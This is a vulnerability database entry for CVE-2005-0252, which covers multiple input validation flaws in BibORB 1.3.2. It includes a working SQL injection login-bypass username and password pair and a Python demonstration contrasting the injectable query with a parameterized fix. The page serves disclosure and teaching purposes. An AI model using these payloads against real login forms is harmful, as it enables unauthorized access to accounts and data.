BibORB Multiple Input Validation Vulnerabilities


Vulnerability ID: 1108463
Vulnerability type: SQL injection
Published: 2005-02-17
Updated: 2005-10-20
CVE ID: CVE-2005-0252
CNNVD-ID: CNNVD-200505-190
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/25121
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-190
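|Vulnerability details
A SQL injection vulnerability exists in BibORB 1.3.2 and possibly earlier versions, allowing remote attackers to execute arbitrary SQL commands via the (1) Username or (2) Password.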
|Exploit
source: http://www.securityfocus.com/bid/12583/info
   
   
BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks.
   
These vulnerabilities are reported to affect BibORB version 1.3.2 and all previous versions. 

When logging in, use the following username and password:

Username: x' or 1=1 or login='x
Password: x') or 1=1 or password=md5('x
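
Why these two strings bypass the login, as an added example (not BibORB's code and not from the advisory): the query shape, table and column names, and the sample account are assumptions inferred from the payloads above, run against an in-memory SQLite database with an `md5()` function registered to stand in for MySQL's. The parameterized variant shows the fix.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed in-memory user table; the schema is an assumption, not BibORB's."""
    db = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so the query can mirror the payload's md5().
    db.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("alice", hashlib.md5(b"correct horse").hexdigest()))
    return db


def build_vulnerable_sql(user, password):
    # Inputs are spliced into the SQL text, so a quote in either field
    # closes the string literal and the rest is parsed as SQL.
    return ("SELECT login FROM users WHERE login='" + user +
            "' AND password=md5('" + password + "')")


def login_vulnerable(db, user, password):
    return db.execute(build_vulnerable_sql(user, password)).fetchone() is not None


def login_parameterized(db, user, password):
    # Placeholders bind the inputs as data; they never reach the SQL parser.
    sql = "SELECT login FROM users WHERE login=? AND password=md5(?)"
    return db.execute(sql, (user, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # The username and password given on this page.
    user = "x' or 1=1 or login='x"
    password = "x') or 1=1 or password=md5('x"
    # The resulting WHERE clause contains "or 1=1", which is true for every row.
    print(build_vulnerable_sql(user, password))
    print("vulnerable login accepted:   ", login_vulnerable(db, user, password))
    print("parameterized login accepted:", login_parameterized(db, user, password))
```
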
|References

Source: BID
Name: 12583
Link: http://www.securityfocus.com/bid/12583
Source: FULLDISC
Name: 20050217 Advisory: Multiple Vulnerabilities in BibORB
Link: http://marc.theaimsgroup.com/?l=full-disclosure&m=110864983905770&w=2
Source: BUGTRAQ
Name: 20050217 Advisory: Multiple Vulnerabilities in BibORB
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110868948719773&w=2
